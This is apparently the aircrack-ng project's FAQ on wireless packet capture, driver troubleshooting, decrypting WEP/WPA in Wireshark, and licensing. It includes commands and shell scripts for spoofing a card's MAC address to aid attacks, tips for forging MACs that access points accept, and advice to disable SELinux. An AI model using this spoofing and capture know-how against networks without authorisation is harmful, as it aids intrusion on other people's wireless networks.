From the command line you may use the mergecap program to merge .cap files (part of the Wireshark/Ethereal package or the win32 distribution):

mergecap -F pcap test1.cap test2.cap test3.cap -w out.cap

It will merge test1.cap, test2.cap and test3.cap into out.cap

mergecap -F pcap *.cap -w out.cap

It will merge all the .cap files contained in the current folder into out.cap

You may use the ivstools program to merge .ivs files (part of aircrack-ng package)
Can I convert cap files to ivs files ?

You may use the ivstools program (part of aircrack-ng package)
Can I use Wireshark/Ethereal to capture 802.11 packets ?

Under Linux, simply setup the card in monitor mode with the airmon-ng script. Under Windows, Wireshark can capture 802.11 packets using AirPcap. Except in very rare cases, Ethereal cannot capture 802.11 packets under Windows.
Can Wireshark/Ethereal decode WEP or WPA data packets ?

Recent versions of Ethereal and Wireshark can decrypt WEP. Go to Edit ? Preferences ? Protocols ? IEEE 802.11, select 1 in the WEP key count and enter your WEP key below.

Wireshark 0.99.5 and above can decrypt WPA as well. Go to Edit ? Preferences ? Protocols ? IEEE 802.11, select Enable decryption, and fill in the key according to the instructions in the preferences window. You can also select Decryption Keys from the wireless toolbar if it's displayed.

Many times in this forum and on the wiki we suggest using Wireshark to review packets. There are two books which are available specifically for learning how to use Wireshark in detail.

The good news is that they have made Chapter 6 of the Wireshark & Ethereal Network Protocol Analyzer Toolkit covering wireless packets available online in PDF format. Here is the link to Chapter 6. As well, see this section on the Wireshark Wiki.
What are the different wireless filter expressions ?

The Wireshark display filter reference lists wlan (general 802.11), wlan_mgmt (802.11 management), wlancap (AVS capture header), wlancertextn (802.11 certificate extensions), and radiotap (radiotap header)
How do I change my card's MAC address ?

Note: It is not necessary to change the MAC address anymore to perform attacks; this can, in some cases, confuse the driver.

Under linux, the following information applies.

One method is:

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Be aware that the example above does not work with every driver.

The easier way is to use the macchanger package. The documentation and download is at: macchanger.

If you are using mac80211 drivers and have a mon0 interface then:

 ifconfig mon0 down
 
 macchanger -a mon0
 Current MAC: 00:0f:b5:88:ac:82 (Netgear Inc)
 Faked MAC:   00:b0:80:3b:1e:1f (Mannesmann Ipulsys B.v.)
 
 ifconfig mon0 up
 macchanger -s mon0
 Current MAC: 00:b0:80:3b:1e:1f (Mannesmann Ipulsys B.v.)

IMPORTANT In the following scripts, newer versions of the madwifi-ng have deprecated (meaning discontinued) the -bssid option. If you get a warning to this effect, then use -uniquebssid.

Here are scripts which use the macchanger package and work well with madwifi-ng drivers:

Script 1 - Invoked with macc.sh XX:XX:XX:XX:XX:XX

 #!/bin/sh
 cardctl eject
 cardctl insert
 wlanconfig ath0 destroy
 ifconfig wifi0 up
 ifconfig wifi0 down
 macchanger wifi0 -m $1
 wlanconfig ath0 create wlandev wifi0 wlanmode monitor -bssid

Script 2 - For madwifi-ng driver devices

 #!/bin/sh
 # by darkAudax
 # Change the following variables to match your requirements
 FAKEMAC="00:14:6C:71:41:32"
 IFACE="ath0"
 WIFACE="wifi0"
 #
 # The interface is brought up and down twice otherwise
 # it causes a system exception and the system freezes
 #
 ifconfig $IFACE down
 wlanconfig $IFACE destroy
 wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor -bssid
 ifconfig $IFACE up
 ifconfig $IFACE down
 macchanger $WIFACE -m $FAKEMAC
 wlanconfig $IFACE destroy
 wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor -bssid
 ifconfig $IFACE up
 ifconfig $IFACE
 iwconfig
 echo " "
 echo "The wireless card MAC has been set to $FAKEMAC"
 echo " "

Script 3 - For madwifi-ng driver devices

 #!/bin/bash
 #
 # athmacchange.sh - Atheros MAC Changer
 # by brad a
 # foundstone
 #
 
 if [ -z "$1" ]; then
    echo Atheros MAC Changer
    echo -----------------------
    echo IMPORTANT: this assumes we want to change the MAC of wifi0
    echo " if you want to change the MAC of another wifi interface"
    echo " (i.e. wifi1, wifi2, etc...) change the script!"
    echo
    echo usage: $0 [mac]
    echo
    exit
 fi
    
 echo Atheros MAC Changer
 echo -------------------------
 echo -Destroying VAPs:
    
 for i in $( ls /proc/net/madwifi ); do
    wlanconfig $i destroy 2>&1 /dev/null
    echo -e "\t$i - destroyed"
 done
  
 echo -Downing wifi0
 ifconfig wifi0 down
 
 echo -Using macchanger to change MAC of wifi0
 macchanger -m $1 wifi0
 
 echo -Bringing wifi0 back up
 ifconfig wifi0 up
 
 echo -Bringing up one VAP in station mode
 wlanconfig ath create wlandev wifi0 wlanmode monitor -bssid > /dev/null
 
 echo -All done!
 echo -Confirm your settings:
 echo ------------------------------------------------------
 ifconfig wifi0
 echo ------------------------------------------------------

Madwifi-ng Notes: The madwifi site has a detailed documentation page on changing the MAC address under madwifi-ng: How can I change the MAC address of my card? Starting in r2435 of the madwifi-ng driver, they changed the default way in which new VAPs get their MAC address. When creating a new VAP with wlanconfig, you must specify -bssid to have it use the underlying MAC address. If you don't do this, then the new VAP gets a unique MAC. This will cause problems with various aircrack-ng commands.

Under Windows, you may use:

    macmakeup
    Technitium MAC Address Changer

Troubleshooting Tip: A normal MAC address looks like this: 00:09:5B:EC:EE:F2. The first half (00:09:5B) of each MAC address is the manufacturer. The second half (EC:EE:F2) is unique to each network card. Many access points will ignore invalid MAC addresses. So make sure to use a valid wireless card manufacturer code when you make up MAC addresses. Otherwise your packets may be ignored.
Is my card compatible with airodump-ng / aireplay-ng ?

Read the Tutorial: Is My Wireless Card Compatible? tutorial. Then check the Compatible Cards page.
Can I have multiple instance of aireplay-ng running at the same time?

Yes, you can.
How to use spaces, double quote and single quote, etc. in AP names?

    You have to prefix those special characters with a \. This is called escaping a special character. Examples: with\'singlequote, with\doublequote.
    You also need to handle the symbol & the same way. Example: A&B.
    You can use single quotes. Examples: 'with space', 'withdoublequote'.
    As well, you can use double quotes. Examples: with space, with'singlequote.

NOTE: If you enclose the AP name in single or double quotes, then you don't also need to escape special characters within the single or double quotes.

IMPORTANT EXCEPTION: If the AP name contains ! then special care must be taken. The reason is that the bash interpreter thinks you want to repeat a previous command. Your options are:

    Use single quotes as in 'name!with!bang'.
    Escape the ! as in name\!with\!bang.
    Use double quotes plus the escape as in name\!with\!bang

Sometimes the AP name contains leading or trailing spaces. These can be very hard to identify from the airodump-ng screen. Here are a few methods to deal with this situation:

    The airodump-ng text file includes the SSID (AP name) length. So you can compare the length in the text file to the count of visible characters. If the airodump-ng text file count is greater then you know that the SSID has leading or trailing spaces.
    Use wireshark to look at the beacon. Unless the SSID is hidden, the SSID is in quotes and you should be able to see leading/trailing spaces.
    The 1.0rc1 version of aireplay-ng will automatically pull the correct SSID from the beacon for you assuming it is not hidden. Simply omit the SSID parameter from aireplay-ng.

What is the size of ARP packets ?

When captured through a wireless interface, 68 bytes is typical for arp packets originating from wireless clients. 86 bytes is typical for arp requests from wired clients.

On Ethernet, ARP packets when received are typically 60 bytes long. When this is then relayed by a wireless access point, they are 86 bytes. This is, of course, because of the wireless headers. If a wireless client sends an ARP, they are typically 42 bytes long and they become 68 when relayed by the AP.
How can I resolve MAC addresses to IP addresses ?

You can try netdiscover or ARP tools
What are the allowed rates ?
Modulation	Allowed rates
DSSS / CCK	1M, 2M, 5.5M, 11M
OFDM (a/g)	6M, 9M, 12M, 24M, 36M, 48M, 54M
What is the frequency for each channel?

To determine the frequency that a channel uses (or vice versa), check out: Wifi Channels. Or check out Wikipedia List of WLAN Channels. This is a nice graphic showing the channel assignments and their overlap.
How do I convert the HEX characters to ASCII?

Here are some conversion links. Remember to put % in front of each hex character when going from hex to ascii.

    https://www.rapidtables.com/convert/number/hex-to-ascii.html
    http://www.mikezilla.com/exp0012.html

LatinSuD has developed a very useful tool - Javascript WEP Conversion Tool. It can perform a variety of WEP, ASCII and passphrase conversions.
Does the aircrack-ng suite support Airpcap adaptor?

See airpcap.
I have a Prism2 card, but airodump-ng / aireplay-ng doesn't seem to work !

First, make sure you aren't using the orinoco driver. If the interface name is wlan0, then the driver is HostAP or wlan-ng. However if the interface name is eth0 or eth1, then the driver is orinoco and you must disable the driver. The easiest way to do this is to blacklist it in /etc/modprobe.d/blacklist.

Also, it can be a firmware problem. Old firmwares have trouble with test mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure yours is up to date (see Prism2 flashing for instructions). The recommended station firmware version is 1.7.4. If it doesn't work well (kismet or airodump-ng stalls after capturing a couple of packets), try STA 1.5.6 instead (either s1010506.hex for old Prism2 cards, or sf010506.hex for newer ones).

On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems stuck, you will have to reset it, or use HostAP instead. Injection is currently broken on Prism2 USB devices with wlan-ng.
I have an Atheros card, and the madwifi patch crashes the kernel / aireplay-ng keeps saying enhanced RTC support isn't available

There are quite a few problems with some versions of the Linux 2.6 branch (especially before 2.6.11 was released) that will cause a kernel panic when injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is just broken. Thus, is it highly recommended to use either Linux 2.6.11.x or newer.
Why do I have bad speeds when I'm too close to the access point?

Problem: The wireless card behaves badly if the signal is too strong. If you are too close (1-2m) to the access point, you get high quality signal but actual transmission rates drop (down to 5-11Mbps or less). The net result is TCP throughput of about 600KB/s.

This is called antenna and receiver saturation. The signal coming in to the preamplifier is too strong and clips the input of the amplifier, causing signal degradation. This is a normal phenomenon with most 802.11 hardware.

So, is it a driver problem or is it my network hardware?

Neither, really. It's a physics problem. The only solution is to either decrease transmission power, use an antenna with a lower gain factor, or move the access point farther away from the station. You should use wired ethernet when you're close to the access point. If you don't want or you don't have a wire, you can also decrease output power of your Access point or your card.
How do I download and compile aircrack-ng?

See the wiki home page for links to the relevant sub-pages.
The driver won't compile

This usually happens because the linux headers don't match your current running kernel. In this situation, grab the kernel sources or just recompile a fresh kernel, install it and reboot. Then, try again compiling the driver. See this HOWTO for more details about kernel compilation.
Why do I get ioctl(SIOCGIFINDEX) failed: No such device ?

Double check that your device name is correct and that you haven't forgotten a parameter on the command line.

When using linux-wlan-ng driver, be sure to enable the interface first with airmon-ng.
Why do I get 'SIOCSIFFLAGS : No such file or directory' error message

Some drivers require a firmware to be loaded (b43, prism54, zd1211rw, ). The driver typically loads the firmware itself when started.
In this case, the driver didn't find it because the firmware was not in the right place or is missing from the computer. To find the firmware's correct location, read the driver documentation.
Why does my computer lock up when injecting packets ? Is there a solution?

See Airmon-ng arpreplay functions freeze with rt2x00 & rt2570 1.4.0 (wusb54g) in the Forum.
Is VMware supported?

Yes, aircrack-ng suite successfully been run under VMware. One thing about doing VMware, you can't use PCMCIA or PCI cards. You can ONLY use compatible USB wireless cards. Some limited additional information is available here:

    VMWare tips and tricks

Kali is available as a virtual machine.
What other tips do you have?

Various tips
Windows GUI Error message

Running the Windows GUI gives an error message similar to the application failed to initialize properly (0xc0000135). Click on OK to terminate the application. To correct this, ensure you have the Microsoft .NET framework 2.0 installed.
My network card changes it's name from eth0 to eth1

Or even to eth2 or from wlan0 to wlan1 or  You know the symptoms mean if you suffer this problem. This happens when you change your MAC and UDEV thinks it has detected a new network card. UDEV keeps track of this so that your nwc-naming keeps mixed up even after a reboot.

Solution: Disable this function in UDEV

Open /etc/udev/persistent-net-generator.rules in your preferred text editor

Search for

 KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\
 	IMPORT{program}="write_net_rules $attr{address}"

and change it to

 #KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\
 #	IMPORT{program}="write_net_rules $attr{address}"

Save and close.

Open /etc/udev/rules.d/z25_persistent-net.rules in your preferred text editor (z25_ may be something different on your system).

Search for the lines concerning your nwc and delete or just disable them by inserting a leading #.

Reboot and everything should be back to normal and stay there.

Note: If you update udev to a newer revision you may have to do this again.
What is the format of a valid MAC address ?

A normal MAC address looks like this: 00:09:5B:EC:EE:F2. It is composed of six octets. The first half (00:09:5B) of each MAC address is known as the Organizationally Unique Identifier (OUI). Simply put, it is the card manufacturer. The second half (EC:EE:F2) is known as the extension identifier and is unique to each network card within the specific OUI. Many access points will ignore MAC addresses with invalid OUIs. So make sure you use a valid OUI code when you make up MAC addresses. Otherwise, your packets may be ignored by the Access Point. The current list of OUIs may be found here.

Make sure that that the last bit of first octet is 0. This corresponds to unicast addresses. If it is set to 1, this indicates a group address, which is normally exclusively used by multicast traffic. MAC addresses with a source set to multicast are invalid and will be dropped.

    Examples of valid OUIs: 00:1B:23, 08:14:43, AA:00:04 because 0, 8 and A are even
    Examples of invalid OUIs: 01:1B:23, 03:23:32

In particular, it is recommended that the first octet is 00.
What is ARP ?

The address resolution protocol (ARP) is explained in more detail here.
Is Mac OS X supported?

The aircrack-ng suite has limited Mac OS X support. Currently it only supports the following tools: aircrack-ng, packetforge-ng, ivstools and makeivs. Any program which requires opening a wireless interface is not supported.
What is RSSI?

RSSI means Received Signal Strength Indication. RSSI is a measurement of the received radio signal strength. It is the received signal strength in a wireless environment, in arbitrary units.

For more information, see https://en.wikipedia.org/wiki/RSSI
What is the difference with long and short preamble?

Every packet is sent with a preamble, which is just a known pattern of bits at the beginning of the packet so that the receiver can sync up and be ready for the real data. This preamble must be sent at the basic rate (1 Mbps), according to the official standard. But there are two different kinds of preambles, short and long. The long preamble has a field size of 128 bits, while the short preamble is only 56 bits.
Will I get better range with maximum output power?

No, this is a false assumption in most situations.

In a home environment, the best output power is not always the maximum. In most situations, 30mw is enough. However, if you are a long distance from the AP, then yes, maximum output power is the best.
Do wifi amplifiers have a better range?

No, amplifiers are not a very good idea because:

    Amplifiers also amplify noise and that's not a good thing for link quality
    With high amplification, you could get a headache

You are much better off purchasing a good antenna with high gain.
My card says that I have 20dBm (100mW) but i only have 18dBm, why?

Most cards have 100mW when combined with the antenna (2dBi antenna).

In 802.11a and 802.11g, the output power is 30mW due to modulation (it's a bit harder to use OFDM than CCK)
Will I have better reception with stronger transmit power?

No, the transmit power is not linked with receiving at all. For receiving, you should check the receive sensitivity of your card. As well, you are much better off purchasing a good antenna with high gain.
How do I choose an antenna?

You should see Antenna help, Selecting a Wifi Antenna.
How Do I Put My Card Back Into Managed Mode

See airmon-ng documentation.
How Do I Check What Mode My Card Is In?

Use iwconfig to view the current speed setting of the wireless card. 1, 2, 5.5 and 11Mbit are 802.11b, 6, 9, 12, 18, 24, 36, 48, 54Mbit are 802.11a/g. Anything above 54Mbit is 802.11n.
How Do I Add a New USB Device ID to My Driver?

If you have a very new USB device, sometimes the device ID has not been included in the driver. The following article describes how to do this for a specific driver. The technique can be used for all USB drivers.

Adding new device IDs to zd1211rw
Why do I get "Error creating tap interface: Permission denied" or a similar message?

You receive one or both of the following errors:

 error creating tap interface: Permission denied
 error opening tap device: Permission denied

This is caused by SELinux (Security Enhanced Linux) preventing the interface from starting. To resolve, disable SELinux. See the support forums for your particular linux to determine how to do this.
Why airodump-ng doesn't display anything on Android terminal?

By default, in settings, stty rows and columns are set to 0. Here are the settings:

    stty columns 86
    stty rows 39

How much does Aircrack-ng cost?

Aircrack-ng is free software; you can download it without paying any license fee. The version of Aircrack-ng you download isn't a demo version, with limitations not present in a full version; it is the full version. The license under which Aircrack-ng is issued is mostly the GNU General Public License version 2. See the GNU GPL FAQ for some more information.

You may also want to check out the OpenSSL license included in our source code download.
But I just paid someone on eBay for a copy of Aircrack-ng! Did I get ripped off?

That depends. Did they provide any sort of value-added product or service, such as installation support, installation media, training, trace file analysis, or funky-colored socks? Probably not. Aircrack-ng is available for anyone to download, absolutely free, at any time. Paying for a copy implies that you should get something for your money.
Can I use Aircrack-ng commercially?

Yes, if, for example, you mean I work for a commercial organization; can I use Aircrack-ng to capture and asses WiFi network security in our company's networks or in our customer's networks?

If you mean Can I use Aircrack-ng as part of my commercial product?, see the next entry in the FAQ.
Can I use Aircrack-ng as part of my commercial product?

As noted, Aircrack-ng is licensed under the GNU General Public License, version 2. The GPL imposes conditions on your use of GPL'ed code in your own products; you cannot, for example, make a derived work from Aircrack-ng, by making modifications to it, and then sell the resulting derived work and not allow recipients to give away the resulting work. You must also make the changes you've made to the Aircrack-ng source available to all recipients of your modified version; those changes must also be licensed under the terms of the GPL. See the GPL FAQ for more details; in particular, note the answer to the question about modifying a GPLed program and selling it commercially, and the question about linking GPLed code with other code to make a proprietary program. You can combine a GPLed program such as Aircrack-ng and a commercial program as long as they communicate at arm's length, as per this item in the GPL FAQ.

We recommend keeping Aircrack-ng and your product completely separate.

You may also want to check out the OpenSSL license included in our source code download.
Can I take screenshots of Aircrack-ng and use them in my own publications?

Yes. As long as you take the screenshots yourself. If you are using someone else's, you may need to obtain their authorization to use them.
How do I deal with rfkill hard blocks?

A hard block usually is a physical switch on the computer. It can either be a flip switch on the side of the computer, a key combination to press on the keyboard or a setting to enable in the BIOS.

In some cases, if wireless was disabled before Windows was powered off, it will appear like a hard block and the trick is to enable wireless in Windows then reboot.
"ath10k_pci 0000:03:00.0: firmware: failed to load ath10k/pre-cal-pci-0000:03:00.0.bin" and similar in dmesg

TL;DR: even if it sounds bad, don't worry about it.

If a firmware is missing, then your card won't work at all: no interface, scanning or any other function. Firmware may have issues/bugs but that's a different story.

On desktop/laptop cards, the above mentioned file is stored in a dedicated EEPROM on the card itself, so it's not needed. That data is typically only needed on embedded devices, such as routers, or AP, that are lacking the EEPROM, and in that case, it is stored on the filesystem. The reason behind it is cheaper to store it, than adding extra components.

The driver doesn't have any way of knowing if the card has it or not, so it is displaying the message anyway.
Why does using aircrack-ng with "-p 1" use 2 CPUs

The -p parameter controls the amount of threads used for bruteforcing the passphrase; Aircrack-ng has other tasks using the CPU as well.
"device descriptor read/64, error -110" with Ralink rt28xx driver in dmesg

Prior to this message, it can be seen that the device connected on a USB port with xhci_hcd, indicating USB 3.0.

This issue happens mostly in virtual machines, when the USB port is set to 3.0. To work around the issue, power off the virtual machine, edit USB settings of the VM and set it to 2.0.
"xhci_hcd 0000:15:00.0: WARN Set TR Deq Ptr cmd failed due to incorrect slot or ep state" or similar in dmesg

The following may be present in dmesg instead:

xhci_hcd 0000:00:14.0: WARN Cannot submit Set TR Deq Ptr
xhci_hcd 0000:00:14.0: A Set TR Deq Ptr command is pending.

For mt76x0u, you may see any of the following messages as well:

mt76x0u 1-1:1.0: rx urb failed: -71
mt7601u 1-2:1.0: Error: mt7601u_mcu_wait_resp timed out
mt7601u 1-2:1.0: Vendor request req:07 off:0080 failed:-71
mt7601u: probe of 1-2:1.0 failed with error -110

And for rt2800usb:

rt2x00usb_vendor_request: Error - Vendor Request 0x06 failed for offset 0x0404 with error -71
rt2800_wait_csr_ready: Error - Unstable hardware
rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)

This bug affects kernels >= 4.20. It happens mostly when connecting certain USB 2.0 devices on a USB 3.0 port but it can happen with USB 3.0 devices as well. It isn't WiFi adapter's driver's fault, but an issue in the USB subsystem code.

Until the bug is fixed, the workaround for USB 2.0 devices is to plug the device on a USB 2.0 port. If you are using a virtual machine, power off the virtual machine, and change USB port settings to 2.0.
Where can I find airmon-ng on Windows or MacOS?

airmon-ng is a Linux/FreeBSD script only. There is no version for Windows, MacOS, or other OS at this time.
My driver doesn't work anymore, or it does something weird, how to debug?

We are assuming it used to work in the past, and that you have checked that network managers were killed prior to putting the card in monitor mode.

The next step would be to look into 'dmesg' to see if the driver outputs any error or warnings. If the card is USB, clearing it using 'dmesg -c' before plugging the adapter may help, by decreasing the amount of messages you have to go through.

################################################################